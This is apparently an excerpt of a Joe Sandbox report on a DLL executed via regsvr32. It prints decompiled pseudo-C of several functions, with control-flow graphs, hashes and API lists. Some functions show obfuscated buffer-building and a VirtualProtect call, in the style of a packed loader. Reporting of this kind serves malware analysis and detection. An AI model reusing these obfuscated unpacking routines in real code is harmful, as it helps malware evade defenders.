                                                                                                                • Associated: 00000003.00000002.442597093.00000000100C5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442687378.00000000100F5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ExitProcess
                                                                                                                • String ID: DllRegisterServer
                                                                                                                • API String ID: 621844428-1663957109
                                                                                                                • Opcode ID: f164a2c1df02b106beb2bdf30efbd0ca68b12a10d6cf658a2290ad30241125c9
                                                                                                                • Instruction ID: 33a68f159489793551b4bbe44fd859da3e52daeb7b6bced8c0b969fc6bae3dde
                                                                                                                • Opcode Fuzzy Hash: f164a2c1df02b106beb2bdf30efbd0ca68b12a10d6cf658a2290ad30241125c9
                                                                                                                • Instruction Fuzzy Hash: 5EC08CB23083009AFA00EBB28C88E86328EDB00280318880AF600D2114EF3AE9004611
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 10003A82 Relevance: 3.2, APIs: 2, Instructions: 214COMMON
                                                                                                                Download Yara Rule

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 127 10003a82-10003b15 malloc 128 10003bc2-10003bc7 127->128 129 10003b1b-10003bbc 127->129 130 10003bdb-10003d1a 128->130 129->128 129->129 131 10003d20-10003d32 ??3@YAXPAX@Z 130->131 132 10003bc9-10003bd5 130->132 132->130
                                                                                                                C-Code - Quality: 35%
                                                                                                                			E10003A82() {
				signed int _t54;
				signed int _t55;
				void* _t60;
				signed int _t65;
				signed int _t71;
				void* _t72;
				signed int _t78;
				signed int _t96;
				signed int _t97;
				signed int _t100;
				void* _t105;
				signed int _t115;
				void* _t116;
				signed int _t126;
				signed int _t140;
				void* _t142;
				signed int _t152;
				signed int _t154;
				signed int _t168;
				signed int _t171;
				signed int _t208;
				signed int _t209;
				signed int _t218;
				signed int _t219;
				signed int _t220;
				intOrPtr _t227;
				void* _t228;

				_t152 =  *0x100b8264; // 0x0
				_t54 =  *0x100b8254; // 0x0
				_t171 =  *0x100b8260; // 0x0
				_t218 =  *0x100b8258; // 0x0
				_t208 =  *0x100b8250; // 0x0
				_t55 = _t54 * _t208;
				_t126 = 0;
				_t2 = _t55 + 1; // 0x1
				 *(_t228 + 0x1c) = 0;
				_t60 = malloc(((_t152 * _t152 + _t2) * _t218 + (_t171 - _t152 * _t54 - _t218 - _t208 + 1) * _t171 + 0x1d40) * 3);
				_t209 =  *0x100b8258; // 0x0
				_t219 =  *0x100b8260; // 0x0
				 *(_t228 + 0x20) = _t60;
				_t154 =  *0x100b8264; // 0x0
				_t227 =  *((intOrPtr*)(_t228 + 0x24));
				if((0x1d40 - _t219) * 3 - (_t154 * _t209 + 1) *  *0x100b825c - _t154 > 0) {
					do {
						_t105 = 0xfffffffc;
						 *(((_t105 - _t219) *  *0x100b825c - (_t154 * _t219 + 2) *  *0x100b8250 + _t219 + (_t209 -  *0x100b8254) * 2) * 3 + _t126 + _t227) = _t126;
						_t168 =  *0x100b8258; // 0x0
						_t220 =  *0x100b8264; // 0x0
						_t115 =  *0x100b8260; // 0x0
						_t116 = 3;
						 *((char*)(((_t116 - _t168) *  *0x100b8254 + (_t115 * _t168 - _t220) * _t115 + _t220) * 3 +  *(_t228 + 0x1c) + _t126)) =  *((intOrPtr*)(_t126 %  *(_t228 + 0x2c) +  *((intOrPtr*)(_t228 + 0x28))));
						_t154 =  *0x100b8264; // 0x0
						_t209 =  *0x100b8258; // 0x0
						_t219 =  *0x100b8260; // 0x0
						_t126 = _t126 + 1;
					} while (_t126 < (0x1d40 - _t219) * 3 - (_t154 * _t209 + 1) *  *0x100b825c - _t154);
				}
				 *(_t228 + 0x14) =  *(_t228 + 0x14) & 0x00000000;
				while(1) {
					_t65 =  *0x100b8254; // 0x0
					asm("cdq");
					_t71 =  *0x100b8250; // 0x0
					_t140 =  *0x100b825c; // 0x0
					 *(_t228 + 0x1c) = (( *( *((intOrPtr*)(_t228 + 0x18)) - _t154 * _t65 +  *0x100b825c + _t154 * _t65 +  *0x100b825c + _t227) & 0x000000ff) +  *((char*)(_t219 - _t219 * _t65 + _t219 * _t65 - _t154 - _t154 - _t65 - _t65 + _t219 +  *(_t228 + 0x1c) +  *(_t228 + 0x14))) +  *(_t228 + 0x1c)) % 0x57c0;
					_t142 = 2;
					_t72 = 3;
					 *((char*)(_t228 + 0x13)) =  *((intOrPtr*)((_t142 - (_t209 * _t209 + _t140 * _t71) * _t219 + (_t209 * _t209 + _t140 * _t71) * _t219) * _t71 +  *(_t228 + 0x14) + ((_t72 - _t219) *  *0x100b8254 + ((_t154 * _t71 + _t209) * _t219 - _t209 - 4) * _t154 + _t209) * 2 + _t227));
					_t78 =  *0x100b8254; // 0x0
					 *((char*)((_t209 * 3 - _t154 - _t154 + _t209) *  *0x100b8254 +  *(_t228 + 0x14) + ((1 - (_t154 * _t219 + _t209) *  *0x100b8250) * _t219 + (1 - _t209) *  *0x100b825c - _t154) * 2 + _t227)) =  *((intOrPtr*)( *((intOrPtr*)(_t228 + 0x18)) - _t78 * 3 + _t227));
					_t96 =  *0x100b825c; // 0x0
					_t97 =  *0x100b8250; // 0x0
					_t100 =  *0x100b8254; // 0x0
					 *(_t228 + 0x14) =  *(_t228 + 0x14) + 1;
					 *((char*)((_t96 * _t96 * _t97 - (_t97 + 1) *  *0x100b8264 << 2) - (4 + _t100 * 8) *  *0x100b8260 +  *((intOrPtr*)(_t228 + 0x18)) + _t227)) =  *((intOrPtr*)(_t228 + 0x13));
					if( *(_t228 + 0x14) >= 0x57c0) {
						break;
					}
					_t209 =  *0x100b8258; // 0x0
					_t219 =  *0x100b8260; // 0x0
					_t154 =  *0x100b8264; // 0x0
				}
				return  *0x100bc094( *(_t228 + 0x1c));
			}






























                                                                                                                0x10003a85
                                                                                                                0x10003a8b
                                                                                                                0x10003a90
                                                                                                                0x10003aa2
                                                                                                                0x10003aa9
                                                                                                                0x10003ab1
                                                                                                                0x10003ab6
                                                                                                                0x10003ac1
                                                                                                                0x10003ad3
                                                                                                                0x10003ad7
                                                                                                                0x10003add
                                                                                                                0x10003ae3
                                                                                                                0x10003ae9
                                                                                                                0x10003aee
                                                                                                                0x10003af4
                                                                                                                0x10003b15
                                                                                                                0x10003b1b
                                                                                                                0x10003b2f
                                                                                                                0x10003b45
                                                                                                                0x10003b48
                                                                                                                0x10003b4e
                                                                                                                0x10003b5c
                                                                                                                0x10003b6d
                                                                                                                0x10003b8e
                                                                                                                0x10003b91
                                                                                                                0x10003b97
                                                                                                                0x10003b9d
                                                                                                                0x10003baa
                                                                                                                0x10003bba
                                                                                                                0x10003b1b
                                                                                                                0x10003bc2
                                                                                                                0x10003bdb
                                                                                                                0x10003bdb
                                                                                                                0x10003c20
                                                                                                                0x10003c28
                                                                                                                0x10003c2d
                                                                                                                0x10003c36
                                                                                                                0x10003c46
                                                                                                                0x10003c64
                                                                                                                0x10003c7c
                                                                                                                0x10003c80
                                                                                                                0x10003ccc
                                                                                                                0x10003ccf
                                                                                                                0x10003cd9
                                                                                                                0x10003ceb
                                                                                                                0x10003d07
                                                                                                                0x10003d17
                                                                                                                0x10003d1a
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x10003bc9
                                                                                                                0x10003bcf
                                                                                                                0x10003bd5
                                                                                                                0x10003bd5
                                                                                                                0x10003d32

                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.442029395.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.442024464.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442187115.000000001008D000.00000020.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442192473.0000000010093000.00000020.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442199197.0000000010097000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442426454.00000000100AA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442455942.00000000100B8000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442523514.00000000100C0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442592062.00000000100C2000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442597093.00000000100C5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442687378.00000000100F5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ??3@malloc
                                                                                                                • String ID:
                                                                                                                • API String ID: 3530088491-0
                                                                                                                • Opcode ID: f8800837ce64f2cdc43e779a333cc347272846a76cd1fc0710a6f39349f454ec
                                                                                                                • Instruction ID: 62f6901f4166316c9f15a6d932215c50802101088afbd3becb357e423d0d5db1
                                                                                                                • Opcode Fuzzy Hash: f8800837ce64f2cdc43e779a333cc347272846a76cd1fc0710a6f39349f454ec
                                                                                                                • Instruction Fuzzy Hash: 7871B53A7442268FD70CCF7CCED65C5BBDAE7D9214B05962AD540CB3B9EA70A609CB40
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 1004FDAA Relevance: 3.0, APIs: 2, Instructions: 28memoryCOMMONLIBRARYCODE
                                                                                                                Download Yara Rule

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 133 1004fdaa-1004fdc8 HeapCreate 134 1004fdcd-1004fdda call 1004fd4f 133->134 135 1004fdca-1004fdcc 133->135 138 1004fe00-1004fe03 134->138 139 1004fddc-1004fde9 call 1004edf9 134->139 139->138 142 1004fdeb-1004fdfe HeapDestroy 139->142 142->135
                                                                                                                C-Code - Quality: 100%
                                                                                                                			E1004FDAA(intOrPtr _a4) {
				void* _t6;
				intOrPtr _t7;
				void* _t10;

				_t6 = HeapCreate(0 | _a4 == 0x00000000, 0x1000, 0); // executed
				 *0x100be104 = _t6;
				if(_t6 != 0) {
					_t7 = E1004FD4F(__eflags);
					__eflags = _t7 - 3;
					 *0x100bff64 = _t7;
					if(_t7 != 3) {
						L5:
						__eflags = 1;
						return 1;
					} else {
						_t10 = L1004EDF9(0x3f8);
						__eflags = _t10;
						if(_t10 != 0) {
							goto L5;
						} else {
							HeapDestroy( *0x100be104);
							 *0x100be104 =  *0x100be104 & 0x00000000;
							goto L1;
						}
					}
				} else {
					L1:
					return 0;
				}
			}






                                                                                                                0x1004fdbb
                                                                                                                0x1004fdc3
                                                                                                                0x1004fdc8
                                                                                                                0x1004fdcd
                                                                                                                0x1004fdd2
                                                                                                                0x1004fdd5
                                                                                                                0x1004fdda
                                                                                                                0x1004fe00
                                                                                                                0x1004fe02
                                                                                                                0x1004fe03
                                                                                                                0x1004fddc
                                                                                                                0x1004fde1
                                                                                                                0x1004fde6
                                                                                                                0x1004fde9
                                                                                                                0x00000000
                                                                                                                0x1004fdeb
                                                                                                                0x1004fdf1
                                                                                                                0x1004fdf7
                                                                                                                0x00000000
                                                                                                                0x1004fdf7
                                                                                                                0x1004fde9
                                                                                                                0x1004fdca
                                                                                                                0x1004fdca
                                                                                                                0x1004fdcc
                                                                                                                0x1004fdcc

                                                                                                                APIs
                                                                                                                • HeapCreate.KERNEL32(00000000,00001000,00000000,10048C0C,00000001,?,?,00000001,?,?,10048D8A,00000001,?,?,100B5A50,0000000C), ref: 1004FDBB
                                                                                                                • HeapDestroy.KERNEL32(?,?,00000001,?,?,10048D8A,00000001,?,?,100B5A50,0000000C,10048E44,?), ref: 1004FDF1
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.442029395.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.442024464.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442187115.000000001008D000.00000020.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442192473.0000000010093000.00000020.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442199197.0000000010097000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442426454.00000000100AA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442455942.00000000100B8000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442523514.00000000100C0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442592062.00000000100C2000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442597093.00000000100C5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442687378.00000000100F5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Heap$CreateDestroy
                                                                                                                • String ID:
                                                                                                                • API String ID: 3296620671-0
                                                                                                                • Opcode ID: 03b4f1f114decc4727ca378d293384e74c17ab74c07022bfccd59dd724457b58
                                                                                                                • Instruction ID: 0ac11d57fa9a87977446124cfbfb09a9c68fff5c93b403867fcd0a28ce5f26ca
                                                                                                                • Opcode Fuzzy Hash: 03b4f1f114decc4727ca378d293384e74c17ab74c07022bfccd59dd724457b58
                                                                                                                • Instruction Fuzzy Hash: 47E06D78A553A29EF710DB748E8D77636D5E704386F30483DF401D60A1EB709980D60A
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 10004AC7 Relevance: 1.7, APIs: 1, Instructions: 209COMMON
                                                                                                                Download Yara Rule

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 143 10004ac7-10004ad7 144 10004ad9-10004ada 143->144 145 10004adf-10004b1a 143->145 146 10004d52-10004d55 144->146 147 10004b20-10004b2e 145->147 148 10004be5-10004ce2 145->148 151 10004b34-10004b3e 147->151 152 10004bdd-10004be0 147->152 149 10004cf4-10004d4c VirtualProtect 148->149 150 10004ce4-10004cf0 148->150 155 10004d4e-10004d51 149->155 150->149 153 10004b40-10004b51 151->153 154 10004b8c-10004bda 151->154 152->155 156 10004b53-10004b80 153->156 157 10004b88 153->157 154->152 155->146 156->152 158 10004b82 156->158 157->154 158->157
                                                                                                                C-Code - Quality: 91%
                                                                                                                			E10004AC7() {
				intOrPtr _t88;
				signed int _t90;
				signed int _t91;
				signed int _t102;
				signed int _t103;
				signed int _t113;
				signed int _t119;
				signed int _t121;
				signed int _t125;
				signed int _t131;
				signed int _t143;
				signed int _t144;
				signed int _t181;
				signed int _t182;
				signed int _t183;
				signed int _t187;
				signed int _t188;
				signed int _t192;
				signed int _t197;
				signed int _t204;
				signed int _t207;
				signed int _t224;
				signed int _t239;
				intOrPtr* _t248;
				void* _t256;

				_t187 =  *(_t256 + 0x18);
				_t88 =  *((intOrPtr*)(_t187 + 8));
				 *((intOrPtr*)(_t256 + 0xc)) = _t88;
				if(_t88 != 0) {
					_t183 =  *0x100b8254; // 0x0
					_t143 =  *(_t187 + 0xc);
					_t188 =  *0x100b825c; // 0x0
					_t207 =  *0x100b8264; // 0x0
					_t204 =  *0x100b8258; // 0x0
					_t90 = _t204 * _t183;
					_t6 = _t188 - 2; // -2
					 *(_t256 + 0x10) = _t90;
					 *(_t256 + 0x14) = _t143;
					if((_t143 & (_t90 + _t6) * _t207 + 0x02000000) == 0) {
						_t91 =  *0x100b8260; // 0x0
						_t144 =  *0x100b8250; // 0x0
						_t47 = _t183 + 2; // 0x2
						_t52 = _t183 + 0x8000000; // 0x8000000
						asm("sbb ebx, ebx");
						asm("sbb eax, eax");
						_t224 =  *0x100b8250; // 0x0
						_t102 =  *0x100b8250; // 0x0
						_t103 =  *0x100b8260; // 0x0
						_t192 =  *0x100b825c; // 0x0
						_t197 =  *0x100b8250; // 0x0
						asm("sbb eax, eax");
						 *(_t256 + 0x18) =  *(0x100b826c + ( ~( ~(_t103 * _t103 + _t192 * _t183 * _t183 + _t103 + (_t224 - _t204 * _t207 - _t188 - 0x00000001) * _t207 - (_t102 + _t204) * _t103 * _t183 + _t204 + _t183 - 0x80000000 &  *(_t256 + 0x14))) + ( ~( ~(0x40000000 + ((_t144 + _t91 + 0x00000001) * _t91 - _t47 * _t183 + _t207 * 0x00000003 - _t188 - _t204) * 0x00000004 &  *(_t256 + 0x14))) +  ~( ~(((_t91 - _t207) *  *0x100b8250 * 0x00000004 - 0x00000008) *  *0x100b8260 + (_t183 + _t52 - _t188 - _t207) * 0x00000004 &  *(_t256 + 0x14))) * 2) * 2) * 4);
						_t113 =  *0x100b8260; // 0x0
						if(( *(_t256 + 0x14) & (1 -  *(_t256 + 0x10) - _t113) * _t207 - _t197 * 0x00000003 - _t113 -  *0x100b825c +  *(_t256 + 0x10) + 0x4000001) != 0) {
							 *(_t256 + 0x18) =  *(_t256 + 0x18) | 0x00000200 - _t113 * 0x0000000c;
						}
						_t119 = VirtualProtect( *( *(_t256 + 0x34)),  *((intOrPtr*)(_t256 + 0x24)) - _t197 * 3,  *(_t256 + 0x1c), _t256 + (((_t113 + _t204) * 8 - 8) * _t113 - (_t183 * _t183 << 3) + 8) * _t113 + 0x28 + ((_t183 * _t207 + 1) * _t204 - _t183 * 3 - (_t207 << 2)) * 8); // executed
						asm("sbb eax, eax");
						_t121 =  ~( ~_t119);
						L14:
						return _t121;
					}
					_t239 =  *(_t256 + 0x28);
					_t181 =  *_t239;
					 *(_t256 + 0x18) = _t181;
					if(_t181 !=  *((intOrPtr*)(_t239 + 4))) {
						L10:
						_t121 = 1;
						goto L14;
					}
					_t182 =  *0x100b8260; // 0x0
					if( *((intOrPtr*)(_t239 + 0x10)) != 0) {
						L9:
						_t125 =  *0x100b8250; // 0x0
						_t35 = _t125 * 2; // 0x2001
						_t38 = _t125 * _t125 * _t125 * _t183 - 8; // -8
						 *((intOrPtr*)( *((intOrPtr*)(_t256 + 0x30)) + 0x20))( *((intOrPtr*)(_t256 + 0x24)),  *((intOrPtr*)(_t256 + 0x24)), (_t125 * _t125 * _t125 * _t183 + _t38) * _t182 + ((1 - _t90 - _t207) * _t204 - (_t183 + _t207) * _t188 + _t183 + _t35 + 0x2000 + _t207) * 2,  *((intOrPtr*)( *((intOrPtr*)(_t256 + 0x24)) + 0x34)));
						goto L10;
					}
					_t248 =  *((intOrPtr*)(_t256 + 0x24));
					_t131 =  *(_t248 + 0x3c);
					 *(_t256 + 0x28) = _t131;
					if( *((intOrPtr*)( *_t248 + 0x38)) == _t131) {
						L8:
						_t90 =  *(_t256 + 0x10);
						goto L9;
					}
					if( *(_t256 + 0x1c) %  *(_t256 + 0x28) + ((_t183 - _t204 * _t207) * _t204 - (_t188 * _t204 + _t182 + 2) * _t188 + _t182 + _t207) * 2 != 0) {
						goto L10;
					}
					_t188 =  *0x100b825c; // 0x0
					goto L8;
				}
				return _t88 + 1;
			}




























                                                                                                                0x10004aca
                                                                                                                0x10004ace
                                                                                                                0x10004ad3
                                                                                                                0x10004ad7
                                                                                                                0x10004adf
                                                                                                                0x10004ae6
                                                                                                                0x10004ae9
                                                                                                                0x10004af1
                                                                                                                0x10004af8
                                                                                                                0x10004b00
                                                                                                                0x10004b03
                                                                                                                0x10004b12
                                                                                                                0x10004b16
                                                                                                                0x10004b1a
                                                                                                                0x10004be5
                                                                                                                0x10004bea
                                                                                                                0x10004bf7
                                                                                                                0x10004c15
                                                                                                                0x10004c1e
                                                                                                                0x10004c46
                                                                                                                0x10004c48
                                                                                                                0x10004c5a
                                                                                                                0x10004c64
                                                                                                                0x10004c75
                                                                                                                0x10004c8a
                                                                                                                0x10004ca1
                                                                                                                0x10004cb9
                                                                                                                0x10004cbd
                                                                                                                0x10004ce2
                                                                                                                0x10004cf0
                                                                                                                0x10004cf0
                                                                                                                0x10004d42
                                                                                                                0x10004d4a
                                                                                                                0x10004d4c
                                                                                                                0x10004d4e
                                                                                                                0x00000000
                                                                                                                0x10004d51
                                                                                                                0x10004b20
                                                                                                                0x10004b24
                                                                                                                0x10004b2a
                                                                                                                0x10004b2e
                                                                                                                0x10004bdd
                                                                                                                0x10004bdf
                                                                                                                0x00000000
                                                                                                                0x10004bdf
                                                                                                                0x10004b38
                                                                                                                0x10004b3e
                                                                                                                0x10004b8c
                                                                                                                0x10004ba5
                                                                                                                0x10004bac
                                                                                                                0x10004bc0
                                                                                                                0x10004bd7
                                                                                                                0x00000000
                                                                                                                0x10004bda
                                                                                                                0x10004b40
                                                                                                                0x10004b44
                                                                                                                0x10004b4a
                                                                                                                0x10004b51
                                                                                                                0x10004b88
                                                                                                                0x10004b88
                                                                                                                0x00000000
                                                                                                                0x10004b88
                                                                                                                0x10004b80
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x10004b82
                                                                                                                0x00000000
                                                                                                                0x10004b82
                                                                                                                0x00000000

                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.442029395.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.442024464.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442187115.000000001008D000.00000020.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442192473.0000000010093000.00000020.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442199197.0000000010097000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442426454.00000000100AA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442455942.00000000100B8000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442523514.00000000100C0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442592062.00000000100C2000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442597093.00000000100C5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442687378.00000000100F5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: ef3a04f4dff34a31cf402d9c2459d2c1a64f6553dd01cc38d54e39f4c535d94b
                                                                                                                • Instruction ID: cba6f9133dd935da1f7fb0af6c162101a408afe13dd0a8dcfb9efeb81b3381b4
                                                                                                                • Opcode Fuzzy Hash: ef3a04f4dff34a31cf402d9c2459d2c1a64f6553dd01cc38d54e39f4c535d94b
                                                                                                                • Instruction Fuzzy Hash: 2D81A87524431E8FD708DF68CAC1A85BBE8FB99340F01563AD955CB2B5F670DA18CB84
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 10006A41 Relevance: 1.5, APIs: 1, Instructions: 28COMMON
                                                                                                                Download Yara Rule

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 160 10006a41-10006a4e call 10047026 163 10006a50 160->163 164 10006a51-10006a5f 160->164 165 10006a61-10006a6b 164->165 166 10006a6d-10006a6e call 100470e9 164->166 165->165 165->166 168 10006a73-10006a81 166->168
                                                                                                                C-Code - Quality: 61%
                                                                                                                			E10006A41(void* __eax, void* __ebx, void* __esi, void* __eflags) {
				void* _t4;
				signed int _t9;
				char _t11;
				signed int _t14;
				void* _t16;
				void* _t17;
				signed int _t19;

				_t4 = E10047026(__ebx, _t16, _t17, __esi);
				if(_t4 != 0) {
					_t14 =  *0x100b8268; // 0x0
					_push(__ebx);
					_t11 = 0;
					__eflags = _t14;
					_push(__esi);
					_t19 = _t14;
					if(__eflags > 0) {
						do {
							 *((char*)(_t11 + _t4)) = _t11;
							_t11 = _t11 + 1;
							__eflags = _t11 -  *0x100b8268; // 0x0
						} while (__eflags < 0);
					}
					_push(_t4); // executed
					E100470E9(_t11, _t17, _t19, __eflags); // executed
					asm("sbb eax, eax");
					_t9 =  ~(_t11 - _t19) & 0x00000003;
					__eflags = _t9;
					return _t9;
				} else {
					return _t4;
				}
			}










                                                                                                                0x10006a46
                                                                                                                0x10006a4e
                                                                                                                0x10006a51
                                                                                                                0x10006a57
                                                                                                                0x10006a58
                                                                                                                0x10006a5a
                                                                                                                0x10006a5c
                                                                                                                0x10006a5d
                                                                                                                0x10006a5f
                                                                                                                0x10006a61
                                                                                                                0x10006a61
                                                                                                                0x10006a64
                                                                                                                0x10006a65
                                                                                                                0x10006a65
                                                                                                                0x10006a61
                                                                                                                0x10006a6d
                                                                                                                0x10006a6e
                                                                                                                0x10006a7a
                                                                                                                0x10006a7d
                                                                                                                0x10006a7d
                                                                                                                0x10006a81
                                                                                                                0x10006a50
                                                                                                                0x10006a50
                                                                                                                0x10006a50

                                                                                                                APIs
                                                                                                                • _malloc.LIBCMT ref: 10006A46
                                                                                                                  • Part of subcall function 10047026: __FF_MSGBANNER.LIBCMT ref: 10047049
                                                                                                                  • Part of subcall function 10047026: __NMSG_WRITE.LIBCMT ref: 10047050
                                                                                                                  • Part of subcall function 10047026: RtlAllocateHeap.NTDLL(00000000,-0000000E,00000001,00000000,00000000,?,1005493C,?,00000001,00000001,1004ECAF,00000018,100B5BF0,0000000C,1004ED3E,00000001), ref: 1004709E
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.442029395.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.442024464.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442187115.000000001008D000.00000020.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442192473.0000000010093000.00000020.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442199197.0000000010097000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442426454.00000000100AA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442455942.00000000100B8000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442523514.00000000100C0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442592062.00000000100C2000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442597093.00000000100C5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442687378.00000000100F5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: AllocateHeap_malloc
                                                                                                                • String ID:
                                                                                                                • API String ID: 501242067-0
                                                                                                                • Opcode ID: 0c74340f4aac69231e506ba60836da3ec54c1cf5d74f5cb118ecd3987c823857
                                                                                                                • Instruction ID: 4f145986321b1b754f88d515b63b48c0031841552eadea7b4491a108aed0ee8e
                                                                                                                • Opcode Fuzzy Hash: 0c74340f4aac69231e506ba60836da3ec54c1cf5d74f5cb118ecd3987c823857
                                                                                                                • Instruction Fuzzy Hash: A3E0CD3B3555234FFF04FBFC9CD54551249D71509132447B9F441D6556E920ED00C761
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 1004C659 Relevance: 1.5, APIs: 1, Instructions: 6COMMONLIBRARYCODE
                                                                                                                Download Yara Rule

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 169 1004c659-1004c65f call 1004c569 171 1004c664-1004c667 169->171
                                                                                                                C-Code - Quality: 25%
                                                                                                                			E1004C659() {
				void* _t1;
				void* _t2;
				void* _t3;
				void* _t4;
				void* _t7;

				_push(1);
				_push(0);
				_push(0); // executed
				_t1 = E1004C569(_t2, _t3, _t4, _t7); // executed
				return _t1;
			}








                                                                                                                0x1004c659
                                                                                                                0x1004c65b
                                                                                                                0x1004c65d
                                                                                                                0x1004c65f
                                                                                                                0x1004c667

                                                                                                                APIs
                                                                                                                • _doexit.LIBCMT ref: 1004C65F
                                                                                                                  • Part of subcall function 1004C569: __lock.LIBCMT ref: 1004C577
                                                                                                                  • Part of subcall function 1004C569: __decode_pointer.LIBCMT ref: 1004C5A6
                                                                                                                  • Part of subcall function 1004C569: __decode_pointer.LIBCMT ref: 1004C5B3
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.442029395.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
